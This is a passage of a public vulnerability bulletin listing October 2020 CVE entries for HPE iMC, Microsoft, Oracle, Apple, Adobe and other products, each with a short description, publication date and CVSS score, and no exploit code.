hp — intelligent_management_center	A devicethresholdconfig expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7192 MISC
hp — intelligent_management_center	A tvxlanlegend expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7185 MISC
hp — intelligent_management_center	A ictexpertcsvdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7193 MISC
hp — intelligent_management_center	A iccselectrules expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7195 MISC
hp — intelligent_management_center	A eventinfo_content expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7142 MISC
hp — intelligent_management_center	A remote bytemessageresource transformentity” input validation code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-24649 MISC
hp — intelligent_management_center	A remote accessmgrservlet classname input validation code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-24647 MISC
hp — intelligent_management_center	A tftpserver stack-based buffer overflow remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-24646 MISC
hp — intelligent_management_center	A remote urlaccesscontroller authentication bypass vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-24629 MISC
hp — intelligent_management_center	A perfaddormoddevicemonitor expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7194 MISC
hp — intelligent_management_center	A comparefilesresult expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	10	CVE-2020-7144 MISC
hp — intelligent_management_center	A viewbatchtaskresultdetailfact expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7184 MISC
hp — intelligent_management_center	A sshconfig expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07).	2020-10-19	9	CVE-2020-7182 MISC
jetbrains — youtrack	In JetBrains YouTrack before 2020.2.10514, SSRF is possible because URL filtering can be escaped.	2020-10-19	7.5	CVE-2020-15822 MISC CONFIRM
loginizer — loginizer	The Loginizer plugin before 1.6.4 for WordPress allows SQL injection (with resultant XSS), related to loginizer_login_failed and lz_valid_ip.	2020-10-21	7.5	CVE-2020-27615 MISC MISC MISC MISC
microsoft — 365_apps	A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory.An attacker who successfully exploited the vulnerability would gain execution on a victim system.The security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory., aka ‘Base3D Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-17003.	2020-10-16	9.3	CVE-2020-16918 MISC
microsoft — 365_apps	A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory, aka ‘Microsoft Outlook Remote Code Execution Vulnerability’.	2020-10-16	9.3	CVE-2020-16947 MISC MISC MISC
microsoft — 365_apps	A remote code execution vulnerability exists when the Microsoft Office Access Connectivity Engine improperly handles objects in memory, aka ‘Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability’.	2020-10-16	9.3	CVE-2020-16957 MISC
microsoft — 3d_viewer	A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory.An attacker who successfully exploited the vulnerability would gain execution on a victim system.The security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory., aka ‘Base3D Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16918.	2020-10-16	9.3	CVE-2020-17003 MISC
microsoft — network_watcher_agent	An elevation of privilege vulnerability exists in Network Watcher Agent virtual machine extension for Linux, aka ‘Network Watcher Agent Virtual Machine Extension for Linux Elevation of Privilege Vulnerability’.	2020-10-16	7.2	CVE-2020-16995 MISC
microsoft — powershellget	A security feature bypass vulnerability exists in the PowerShellGet V2 module, aka ‘PowerShellGet Module WDAC Security Feature Bypass Vulnerability’.	2020-10-16	7.2	CVE-2020-16886 MISC
microsoft — visual_studio_code	A remote code execution vulnerability exists in Visual Studio Code when a user is tricked into opening a malicious ‘package.json’ file, aka ‘Visual Studio JSON Remote Code Execution Vulnerability’.	2020-10-16	9.3	CVE-2020-17023 MISC
microsoft — visual_studio_code	A remote code execution vulnerability exists in Visual Studio Code when the Python extension loads a Jupyter notebook file, aka ‘Visual Studio Code Python Extension Remote Code Execution Vulnerability’.	2020-10-16	9.3	CVE-2020-16977 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16907.	2020-10-16	7.2	CVE-2020-16913 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in Windows Setup in the way it handles directories.A locally authenticated attacker could run arbitrary code with elevated system privileges, aka ‘Windows Setup Elevation of Privilege Vulnerability’.	2020-10-16	7.2	CVE-2020-16908 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16913.	2020-10-16	7.2	CVE-2020-16907 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash, aka ‘Windows Error Reporting Manager Elevation of Privilege Vulnerability’.	2020-10-16	7.2	CVE-2020-16895 MISC
microsoft — windows_10	A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka ‘Windows Hyper-V Remote Code Execution Vulnerability’.	2020-10-16	7.2	CVE-2020-16891 MISC
microsoft — windows_10	A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka ‘Windows Camera Codec Pack Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16968.	2020-10-16	9.3	CVE-2020-16967 MISC
microsoft — windows_10	A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka ‘Microsoft Graphics Components Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16923.	2020-10-16	9.3	CVE-2020-1167 MISC MISC
microsoft — windows_10	A denial of service vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka ‘Windows TCP/IP Denial of Service Vulnerability’.	2020-10-16	7.8	CVE-2020-16899 MISC
microsoft — windows_10	A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory, aka ‘GDI+ Remote Code Execution Vulnerability’.	2020-10-16	9.3	CVE-2020-16911 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory, aka ‘Windows Hyper-V Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-1047.	2020-10-16	7.2	CVE-2020-1080 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory, aka ‘Windows Hyper-V Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-1080.	2020-10-16	7.2	CVE-2020-1047 MISC
microsoft — windows_10	A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka ‘Windows Camera Codec Pack Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16967.	2020-10-16	9.3	CVE-2020-16968 MISC MISC
microsoft — windows_10	A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability’.	2020-10-16	7.8	CVE-2020-16927 MISC
microsoft — windows_10	A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka ‘Jet Database Engine Remote Code Execution Vulnerability’.	2020-10-16	9.3	CVE-2020-16924 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when Windows improperly handles COM object creation, aka ‘Windows COM Server Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16916.	2020-10-16	7.2	CVE-2020-16935 MISC
microsoft — windows_7	A denial of service vulnerability exists in Windows Remote Desktop Service when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Service Denial of Service Vulnerability’.	2020-10-16	7.8	CVE-2020-16863 MISC
mintegral — mintegraladsdk	This affects the package MintegralAdSDK before 6.6.0.0. The SDK distributed by the company contains malicious functionality that acts as a backdoor. Mintegral and their partners (advertisers) can remotely execute arbitrary code on a user device.	2020-10-19	10	CVE-2020-7745 MISC MISC MISC MISC
nagios — nagios_xi	Improper neutralization of special elements used in an OS command in Nagios XI 5.7.3 allows a remote, authenticated admin user to execute operating system commands with the privileges of the apache user.	2020-10-20	9	CVE-2020-5791 MISC
onethird — onethird	Local file inclusion vulnerability in OneThird CMS v1.96c and earlier allows a remote unauthenticated attacker to execute arbitrary code or obtain sensitive information via unspecified vectors.	2020-10-20	7.5	CVE-2020-5640 MISC MISC
oracle — business_intelligence	Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).	2020-10-21	7.8	CVE-2020-14864 MISC
oracle — financial_services_analytical_applications_infrastructure	Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 8.0.6-8.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. While the vulnerability is in Oracle Financial Services Analytical Applications Infrastructure, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Financial Services Analytical Applications Infrastructure. CVSS 3.1 Base Score 8.6 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H).	2020-10-21	7.8	CVE-2020-14824 MISC
oracle — flexcube_direct_banking	Vulnerability in the Oracle FLEXCUBE Direct Banking product of Oracle Financial Services Applications (component: Pre Login). Supported versions that are affected are 12.0.1, 12.0.2 and 12.0.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle FLEXCUBE Direct Banking. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle FLEXCUBE Direct Banking accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N).	2020-10-21	7.1	CVE-2020-14897 MISC
oracle — flexcube_direct_banking	Vulnerability in the Oracle FLEXCUBE Direct Banking product of Oracle Financial Services Applications (component: Pre Login). Supported versions that are affected are 12.0.1, 12.0.2 and 12.0.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle FLEXCUBE Direct Banking. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle FLEXCUBE Direct Banking accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N).	2020-10-21	7.1	CVE-2020-14890 MISC
oracle — hospitality_opera_5_property_services	Vulnerability in the Oracle Hospitality OPERA 5 Property Services product of Oracle Hospitality Applications (component: Logging). Supported versions that are affected are 5.5 and 5.6. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5 Property Services. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality OPERA 5 Property Services. CVSS 3.1 Base Score 6.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H).	2020-10-21	8.5	CVE-2020-14858 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).	2020-10-21	7.5	CVE-2020-14760 CONFIRM MISC
oracle — one-to-one_fulfillment	Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Print Server). Supported versions that are affected are 12.1.1 – 12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle One-to-One Fulfillment. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle One-to-One Fulfillment, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle One-to-One Fulfillment accessible data as well as unauthorized update, insert or delete access to some of Oracle One-to-One Fulfillment accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	7.8	CVE-2020-14863 MISC
oracle — peoplesoft_enterprise_scm_esupplier_connection	Vulnerability in the PeopleSoft Enterprise SCM eSupplier Connection product of Oracle PeopleSoft (component: eSupplier Connection). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise SCM eSupplier Connection. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all PeopleSoft Enterprise SCM eSupplier Connection accessible data as well as unauthorized access to critical data or complete access to all PeopleSoft Enterprise SCM eSupplier Connection accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).	2020-10-21	8.5	CVE-2020-14865 MISC
oracle — scheduler	Vulnerability in the Scheduler component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows low privileged attacker having Local Logon privilege with logon to the infrastructure where Scheduler executes to compromise Scheduler. While the vulnerability is in Scheduler, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Scheduler. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).	2020-10-21	7.2	CVE-2020-14735 MISC
oracle — trade_management	Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	7.8	CVE-2020-14856 MISC
oracle — universal_work_queue	Vulnerability in the Oracle Universal Work Queue product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3 – 12.2.9. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Universal Work Queue. Successful attacks of this vulnerability can result in takeover of Oracle Universal Work Queue. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).	2020-10-21	9	CVE-2020-14862 MISC
oracle — universal_work_queue	Vulnerability in the Oracle Universal Work Queue product of Oracle E-Business Suite (component: Work Provider Administration). The supported version that is affected is 12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Universal Work Queue. Successful attacks of this vulnerability can result in takeover of Oracle Universal Work Queue. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).	2020-10-21	10	CVE-2020-14855 MISC
oracle — weblogic_server	Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).	2020-10-21	10	CVE-2020-14859 MISC MISC
oracle — weblogic_server	Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).	2020-10-21	7.5	CVE-2020-14825 MISC MISC MISC MISC
oracle — weblogic_server	Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).	2020-10-21	7.5	CVE-2020-14841 MISC MISC MISC

Medium Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
acronis — true_image	Acronis True Image 2021 fails to properly set ACLs of the C:ProgramDataAcronis directory. Because some privileged processes are executed from the C:ProgramDataAcronis, an unprivileged user can achieve arbitrary code execution with SYSTEM privileges by placing a DLL in one of several paths within C:ProgramDataAcronis.	2020-10-21	6.9	CVE-2020-10140 MISC
adobe — illustrator	Adobe Illustrator version 24.1.2 (and earlier) is affected by a memory corruption vulnerability that occurs when parsing a specially crafted .svg file. This could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit.	2020-10-20	6.8	CVE-2020-24413 MISC
adobe — illustrator	Adobe Illustrator version 24.1.2 (and earlier) is affected by a memory corruption vulnerability that occurs when parsing a specially crafted .svg file. This could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit.	2020-10-20	6.8	CVE-2020-24415 MISC
adobe — illustrator	Adobe Illustrator version 24.1.2 (and earlier) is affected by a memory corruption vulnerability that occurs when parsing a specially crafted .svg file. This could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit.	2020-10-20	6.8	CVE-2020-24414 MISC
adobe — illustrator	Adobe Illustrator version 24.2 (and earlier) is affected by an out-of-bounds read vulnerability when parsing crafted PDF files. This could result in a read past the end of an allocated memory structure, potentially resulting in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit.	2020-10-20	6.8	CVE-2020-24409 MISC MISC
adobe — illustrator	Adobe Illustrator version 24.1.2 (and earlier) is affected by a memory corruption vulnerability that occurs when parsing a specially crafted .svg file. This could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit.	2020-10-20	6.8	CVE-2020-24412 MISC
adobe — illustrator	Adobe Illustrator version 24.2 (and earlier) is affected by an out-of-bounds read vulnerability when parsing crafted PDF files. This could result in a read past the end of an allocated memory structure, potentially resulting in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit.	2020-10-20	6.8	CVE-2020-24410 MISC MISC
adobe — illustrator	Adobe Illustrator version 24.2 (and earlier) is affected by an out-of-bounds write vulnerability when handling crafted PDF files. This could result in a write past the end of an allocated memory structure, potentially resulting in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit.	2020-10-20	6.8	CVE-2020-24411 MISC MISC
adobe — marketo_sales_insight	Marketo Sales Insight plugin version 1.4355 (and earlier) is affected by a blind stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.	2020-10-20	4.3	CVE-2020-24416 MISC
advantech — r-seenet	The R-SeeNet webpage (1.5.1 through 2.4.10) suffers from SQL injection, which allows a remote attacker to invoke queries on the database and retrieve sensitive information.	2020-10-20	5	CVE-2020-25157 MISC
apple — icloud	An access issue existed in Content Security Policy. This issue was addressed with improved access restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing maliciously crafted web content may prevent Content Security Policy from being enforced.	2020-10-16	4.3	CVE-2020-9915 MISC MISC MISC MISC MISC MISC MISC
apple — icloud	Multiple issues were addressed with improved logic. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication.	2020-10-16	6.5	CVE-2020-9910 MISC MISC MISC MISC MISC MISC MISC
apple — icloud	An input validation issue was addressed with improved input validation. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0, watchOS 7.0, Safari 14.0, iCloud for Windows 11.4, iCloud for Windows 7.21. Processing maliciously crafted web content may lead to a cross site scripting attack.	2020-10-16	4.3	CVE-2020-9952 MISC MISC MISC MISC MISC MISC
apple — icloud	A logic issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing maliciously crafted web content may lead to universal cross site scripting.	2020-10-16	4.3	CVE-2020-9925 MISC MISC MISC MISC MISC MISC MISC
apple — icloud	A command injection issue existed in Web Inspector. This issue was addressed with improved escaping. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Copying a URL from Web Inspector may lead to command injection.	2020-10-16	6.8	CVE-2020-9862 MISC MISC MISC MISC MISC MISC MISC
apple — icloud	An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution.	2020-10-16	4.3	CVE-2020-9894 MISC MISC MISC MISC MISC MISC MISC
apple — icloud	A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution.	2020-10-16	6.8	CVE-2020-9893 MISC MISC MISC MISC MISC MISC MISC
apple — icloud	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.	2020-10-16	6.8	CVE-2020-9936 MISC MISC MISC MISC MISC MISC MISC
apple — icloud	A URL Unicode encoding issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A malicious attacker may be able to conceal the destination of a URL.	2020-10-16	5	CVE-2020-9916 MISC MISC MISC MISC MISC MISC MISC
apple — ipad_os	A logic issue was addressed with improved restrictions. This issue is fixed in iOS 14.0 and iPadOS 14.0, macOS Catalina 10.15.7, tvOS 14.0, watchOS 7.0. A malicious application may be able to access restricted files.	2020-10-16	4.3	CVE-2020-9968 MISC MISC MISC MISC
apple — ipad_os	An issue existed in the handling of iMessage tapbacks. The issue was resolved with additional verification. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A user that is removed from an iMessage group could rejoin the group.	2020-10-16	4.3	CVE-2020-9885 MISC MISC MISC MISC
apple — ipad_os	An input validation issue existed in Bluetooth. This issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8. An attacker in a privileged network position may be able to perform denial of service attack using malformed Bluetooth packets.	2020-10-16	5	CVE-2020-9914 MISC MISC
apple — ipad_os	A logic issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0, watchOS 7.0. A malicious application may be able to leak sensitive user information.	2020-10-16	4.3	CVE-2020-9976 MISC MISC MISC
apple — ipad_os	This issue was addressed with improved checks. This issue is fixed in iOS 13.6 and iPadOS 13.6. A remote attacker may be able to cause a denial of service.	2020-10-16	5	CVE-2020-9917 MISC
apple — ipad_os	A denial of service issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6. A remote attacker may cause an unexpected application termination.	2020-10-16	5	CVE-2020-9931 MISC
apple — ipad_os	A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 14.0 and iPadOS 14.0. A local user may be able to read kernel memory.	2020-10-16	4.9	CVE-2020-9964 MISC
apple — ipad_os	This issue was addressed with improved checks. This issue is fixed in iOS 14.0 and iPadOS 14.0, watchOS 7.0. The screen lock may not engage after the specified time period.	2020-10-16	4.6	CVE-2020-9946 MISC MISC
apple — ipad_os	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution.	2020-10-16	6.8	CVE-2020-9889 MISC MISC MISC MISC
apple — ipad_os	An authorization issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to read sensitive location information.	2020-10-16	4.3	CVE-2020-9933 MISC MISC MISC
apple — ipad_os	A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.	2020-10-16	6.8	CVE-2020-9878 MISC MISC MISC
apple — ipad_os	An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8. An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations.	2020-10-16	4.3	CVE-2020-9909 MISC MISC MISC
apple — ipad_os	An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution.	2020-10-16	6.8	CVE-2020-9891 MISC MISC MISC MISC
apple — ipad_os	A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to break out of its sandbox.	2020-10-16	6.8	CVE-2020-9865 MISC MISC MISC MISC
